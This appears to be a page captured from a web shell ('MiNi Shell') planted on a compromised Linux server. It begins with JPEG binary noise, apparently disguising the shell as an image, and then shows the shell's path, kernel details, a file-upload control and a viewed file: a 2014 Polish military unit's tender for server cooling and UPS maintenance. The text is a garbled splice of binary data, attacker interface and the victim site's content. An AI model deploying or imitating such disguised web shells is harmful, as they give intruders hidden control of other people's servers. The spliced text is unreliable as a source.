JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141016/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141016/218147-N-2014.html

<p class="kh_header"><b>Bydgoszcz: KONSERWACJA SYSTEMU CHŁODZENIA SERWERÓW WODĄ LODOWĄ ORAZ ZASILANIA UPS</b><br>
<b>Numer ogłoszenia: 218147 - 2014; data zamieszczenia: 16.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4246 , ul. Szubińska 2, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 378 97 81, faks 52 3782584.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: obrona (jednostka wojskowa).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONSERWACJA SYSTEMU CHŁODZENIA SERWERÓW WODĄ LODOWĄ ORAZ ZASILANIA UPS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na wykonywaniu napraw bieżących i planowanych oraz usuwaniu awarii, a także przeprowadzeniu jednego kompleksowego przeglądu okresowego niżej wymienionych urządzeń 
i systemów, w zakresie i na zasadach szczegółowo określonych w niniejszej SIWZ 
oraz zgodnie z obowiązującymi przepisami. 
Zakresem przedmiotu zamówienia objęte są:
a)	agregaty wody lodowej firmy Galletti - szt. 3,
b)	węzeł wody lodowej wraz z całym systemem orurowania łączącym poszczególne elementy systemu chłodzenia serwerów, pompami Wilo i pozostałą armaturą,
c)	system chłodzenia zasilaczy awaryjnych UPS z wykorzystaniem central wentylacyjnych typu Hermes,
d)	system chłodzenia serwerów oparty o moduły chłodzące LCP,
e)	zespół modułowych zasilaczy awaryjnych UPS wraz z akumulatorami 
i oprzyrządowaniem - 4 szafy,
f)	komputerowy system wizualizacji wraz z systemem komputerowego sterowania poszczególnymi elementami w/w systemów,
g)	dostawa wentylatorów do szaf Rittala wraz z modułami sterującymi, wskazanych 
w załączniku nr 9 do SIWZ w pkt 5.3 a),b).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa 
w art. 67 ust. 1 pkt. 6 UPZP, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień, co objęte zamówieniem podstawowym, w przypadku ich wystąpienia. 
Informacja o możliwości udzielenia zamówień uzupełniających nie jest zobowiązaniem Zamawiającego do udzielenia takiego zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 50.00.00.00-5, 50.53.20.00-3, 50.51.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 14.1.	Warunkiem udziału w postępowaniu jest wniesienie wadium, przed upływem terminu składania ofert, w wysokości: 10.000,00 PLN (słownie: dziesięć tysięcy złotych 00/100),
14.2.	Wadium może być wnoszone w jednej lub kilku formach, określonych 
w art. 45 ust. 6 UPZP.
14.3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego, tj. NBP O/O Bydgoszcz - Nr konta 70 1010 1078 0091 3313 9120 0000 z adnotacją: WADIUM - COOLING - nr postępowania 018/OZ/PI/2014. Dopuszcza się wskazanie w adnotacji również pełnej nazwy postępowania 
ze wskazaniem jego numeru. 
14.4.	Dowód wniesienia wadium: 
1.	zaleca się dołączyć potwierdzenie przelewu pieniędzy na rachunek bankowy Zamawiającego - w formie oryginału lub kserokopii poświadczonej za zgodność 
z oryginałem przez osobę/y upoważnioną/e do reprezentowania Wykonawcy, zgodnie 
z formą reprezentacji, określoną w rejestrze sądowym lub innym dokumencie,
2.	należy dołączyć w formie oryginału w pozostałych formach określonych 
w art. 45 ust. 6 UPZP.
14.5.	Wadium pozostaje w dyspozycji Zamawiającego i będzie zwrócone 
lub zatrzymane, na zasadach i w trybie określonym w art. 46 UPZP.
14.6.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek bankowy wskazany przez Wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
A) 	spełniają warunki, określone na podstawie art. 22 ust. 1 UPZP, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj.: 
Zamawiający nie precyzuje warunku. 
2)	posiadania wiedzy i doświadczenia, tj.:
wykażą się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
co najmniej jednej usługi (w każdym z zakresów) odpowiadającej swoim rodzajem usługom stanowiącym przedmiot zamówienia, tj.:
a.	wykonaniem kompleksowego przeglądu okresowego (lub trwającej 
nie krócej niż 5 miesięcy usługi serwisu) systemu chłodzenia opartego 
na min. 2 agregatach wody lodowej o wydajności chłodniczej nie mniejszej niż 100 kW każdy,
b.	wykonaniem trwającej nie krócej niż 5 miesięcy usługi konserwacji 
(lub serwisu) systemu chłodzenia opartego na wodzie lodowej posiadającego zład o pojemności nie mniejszej niż 2000 litrów,
c.	wykonaniem trwającej nie krócej niż 5 miesięcy usługi konserwacji 
(lub serwisu) systemu wentylacji, złożonego z min. 2 central wentylacyjnych wyposażonych w chłodnice wraz z automatyką sterującą,
d.	wykonaniem trwającej nie krócej niż 5 miesięcy usługi konserwacji 
(lub serwisu) systemu chłodzącego opartego na modułach LCP w ilości 
nie mniejszej niż 10 modułów,
e.	wykonaniem trwającej nie krócej niż 5 miesięcy usługi konserwacji 
(lub serwisu) min. 2 modułowych urządzeń UPS o mocy nie mniejszej 
niż 100 kVA każdy,
f.	wykonaniem usługi konserwacji (lub serwisu) systemu automatyki opartego na sterownikach PLC.
Ocena, czy Wykonawca spełnia postawione wyżej warunki udziału 
w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, 
na podstawie analizy załączonych do oferty dokumentów określonych 
w pkt. 11.1.2. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie 
art. 23 UPZP, spełniają wymienione wyżej warunki udziału w postępowaniu łącznie.
Warunek uważa się za spełniony, jeśli zakres zrealizowany został w jednym zamówieniu (w ramach jednej umowy) dla jednego podmiotu (lub zespołu podmiotów).
Dopuszcza się możliwość realizacji kilku zakresów (ppkt. a - f) w ramach jednego zamówienia  lub każdego z osobna. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.
W przypadku gdy Wykonawca składa ofertę na więcej niż jedną część zamówienia wymagania dot. wiedzy i doświadczenia sumuje się.
3)	dysponowania odpowiednim:
a.	potencjałem technicznym, tj.: Zamawiający nie precyzuje warunku,
b.	osobami zdolnymi do wykonania zamówienia, tj.:
a)	co najmniej jedną osobą przewidzianą do wykonywania czynności wynikających z przedmiotu zamówienia, w zakresie wglądu 
do dokumentacji powykonawczej oznaczonej klauzulą POUFNE, legitymującą się aktualnym poświadczeniem bezpieczeństwa upoważniającym do dostępu do informacji niejawnych oznaczonych klauzulą POUFNE,
b)	co najmniej dwiema osobami przewidzianymi do wykonywania pozostałych czynności (tj. z wyłączeniem zakresu wskazanego w ppkt a)) wynikających 
z zakresu przedmiotu zamówienia - legitymującymi się aktualnymi poświadczeniami bezpieczeństwa upoważniającymi do dostępu 
do informacji niejawnych oznaczonych klauzulą ZASTRZEŻONE 
(lub wyższej) lub upoważnieniem do dostępu do informacji o klauzuli ZASTRZEŻONE oraz posiadającymi zaświadczenie o przeszkoleniu 
z zakresu informacji niejawnych, zgodnie z ustawą z dnia 5 sierpnia 2010 r. 
o ochronie informacji niejawnych (Dz. U. nr 182, poz. 1228 z późniejszymi zmianami), w tym:
-	co najmniej jedną osobą z uprawnieniami (np. świadectwem kwalifikacyjnym SEP D) wymaganymi przepisami ustawy 
z dnia 10 kwietnia 1997 r. Prawo Energetyczne (Dz. U. z 2006 r. Nr 89, 
poz. 625 z późn. zm.) do wykonywania pracy w zakresie dozoru:
1.	urządzeń i instalacji elektroenergetycznych o napięciu nie wyższym 
niż 1 kV, 
2.	aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828,
-	co najmniej dwiema osobami z uprawnieniami (np. świadectwem kwalifikacyjnym SEP E) wymaganymi przepisami ustawy 
z dnia 10 kwietnia 1997 r. Prawo Energetyczne (Dz. U. z 2006 r. Nr 89, 
poz. 625 z późn. zm.) do wykonywania pracy w zakresie eksploatacji:
1. 	urządzeń, instalacji elektroenergetycznych o napięciu nie wyższym 
niż 1 kV,
2.	aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt.1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828,
-	co najmniej jedną osobą z uprawnieniami (np. świadectwem kwalifikacyjnym SEP D) wymaganymi przepisami ustawy 
z dnia 10 kwietnia 1997 r. Prawo Energetyczne (Dz. U. z 2006 r. Nr 89, 
poz. 625 z późn. zm.) do wykonywania pracy w zakresie dozoru:
1.	urządzeń wentylacji, klimatyzacji i chłodzenia o mocy ponad 50 kW, 
2.	aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828,
-	co najmniej dwiema osobami z uprawnieniami (np. świadectwem kwalifikacyjnym SEP E) wymaganymi przepisami ustawy 
z dnia 10 kwietnia 1997 r. Prawo Energetyczne (Dz. U. z 2006 r. Nr 89, 
poz. 625 z późn. zm.) do wykonywania pracy w zakresie eksploatacji:
1.	urządzeń wentylacji, klimatyzacji i chłodzenia o mocy ponad 50 kW, 
2.	aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89
poz. 828,
-	co najmniej jedną osobą posiadającą świadectwo kwalifikacji 
w zakresie naprawy i obsługi technicznej urządzeń i instalacji chłodniczych zawierających substancje kontrolowane, zgodnie 
z ustawą z dnia 20.04.2004 r. o substancjach zubażających warstwę ozonową - Dz. U. nr 121 poz. 1263,
-	co najmniej jedną osobą posiadającą min. roczne doświadczenie w zakresie serwisowania urządzeń UPS,
-	co najmniej jedną osobą posiadającą min. roczne doświadczenie w zakresie serwisowania układów automatyki sterującej pracą urządzeń 
w oparciu o sterowniki PLC.
Ocena, czy Wykonawca spełnia postawione wyżej warunki udziału 
w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, 
na podstawie analizy załączonych do oferty dokumentów określonych 
w pkt. 11.1.3. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie 
art. 23 UPZP, spełniają wymienione wyżej warunki udziału w postępowaniu łącznie.
Wykonawca może polegać na potencjale technicznym oraz osobach zdolnych 
do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.
4)	sytuacji ekonomicznej i finansowej, tj.: Zamawiający nie precyzuje warunku,
Wykonawca zobowiązany jest ponadto do złożenia oświadczenia, 
iż w przypadku udzielenia mu zamówienia będzie posiadał ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na minimalną sumę ubezpieczenia 2.000.000 PLN, przez cały okres realizacji zamówienia (formularz ofertowy).
B)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie 
z art. 24 ust. 1 UPZP oraz ust. 2 pkt 5 UPZP.
Ocena, czy Wykonawca spełnia postawiony wyżej warunek, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, na podstawie analizy załączonych do oferty dokumentów określonych w pkt. 11.1.4. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie 
art. 23 UPZP, spełniają wymieniony wyżej warunek zgodnie z zapisami pkt 11.8. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak określono w pkt. III.3.1)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak określono w pkt. III.3.1)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak określono w pkt. III.3.1)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak określono w pkt. III.3.1)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany treści niniejszej umowy oraz jej uzupełniania wymagają zgody umawiających się Stron wyrażonej na piśmie w formie aneksu podpisanego przez obie Strony pod rygorem nieważności. Powyższe nie dotyczy wyjątków wskazanych w umowie.
2. 	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika 
z zaistnienia następujących warunków:
1)	w przypadku zaistnienia sytuacji nadzwyczajnych i niecierpiących zwłoki w zakresie wymaganego od Zamawiającego wsparcia dla jednostek (instytucji) rozmieszczonych 
w kompleksie przy ul. Szubińskiej 2,
2)	zaistnienia obiektywnych, niezależnych od Stron przeszkód w realizacji umowy 
w dotychczasowym kształcie, w tym siły wyższej oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
3)	zaistnienia konieczności przedłużenia terminu realizacji umowy, w przypadku zaistnienia obiektywnych, niezależnych od Wykonawcy przeszkód w realizacji umowy w terminie 
jej obowiązywania, których nie można było przewidzieć w chwili zawarcia umowy 
(np. niedostępności niezbędnych do dokonania napraw materiałów, części, itp.),
4)	zaistnienia konieczności zwiększenia wartości umowy spowodowanej potrzebą zakupu podzespołów, materiałów, środków, usług oraz części o których mowa w § 3 ust. 6 niniejszej umowy, z zastrzeżeniem, że zmiana ta będzie możliwa jedynie w przypadku posiadania środków finansowych przez Zamawiającego,
5)	potrzeby zmian wynikających z postanowień niniejszej umowy,
6)	zmiany te są korzystne lub neutralne dla Zamawiającego,
7)	zmiany przepisów prawa, powodujące konieczność dostosowania warunków zawartych 
w umowie do obowiązującego stanu prawnego.
3.	Zmiany przewidziane w umowie mogą być wprowadzone na wniosek Strony umowy.
4.	Warunkiem wprowadzenia zmian, o których mowa w ust. 2 jest złożenie wniosku o którym mowa 
w ust. 3 wraz z uzasadnieniem zawierającym, odpowiednio: opis i uzasadnienie propozycji zmian, opis wpływu zmiany na harmonogram, koszty i termin wykonania umowy.
5.	W przypadku zaistnienia okoliczności, o których mowa w ust. 2 pkt. 3), Zamawiający może wydłużyć termin realizacji umowy o czas niezbędny, celem należytego wykonania zobowiązań umownych Wykonawcy, z zastrzeżeniem, że nie może to powodować żadnych dodatkowych kosztów 
dla Zamawiającego, poza określonymi w § 3 ust. 6 niniejszej umowy. Warunkiem wprowadzenia zmian, o których mowa w ust. 2 pkt. 3), poza wskazanymi w ust. 4, jest dostarczenie dokumentu podpisanego przez uprawnione osoby potwierdzającego w sposób obiektywny zaistnienie okoliczności, na które powołuje się Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mon.gov.pl/ogloszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4246, ul. Szubińska 2, 85-915 Bydgoszcz, pom. 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2014 godzina 11:00, miejsce: Jednostka Wojskowa Nr 4246, ul. Szubińska 2, 85-915 Bydgoszcz, kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin otwarcia ofert: 04 listopada 2014 r., godz. 11:30.
Termin wykonania zamówienia: od dnia podpisania umowy, nie wcześniej niż od dnia 01 stycznia 2015 r. do dnia 31 grudnia 2015 r., z tym, że Wykonawca dostarczy produkty wskazane w pozycjach nr 13 i 14 formularza ofertowego w terminie do 30 dni od dnia złożenia zamówienia 
przez Zamawiającego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com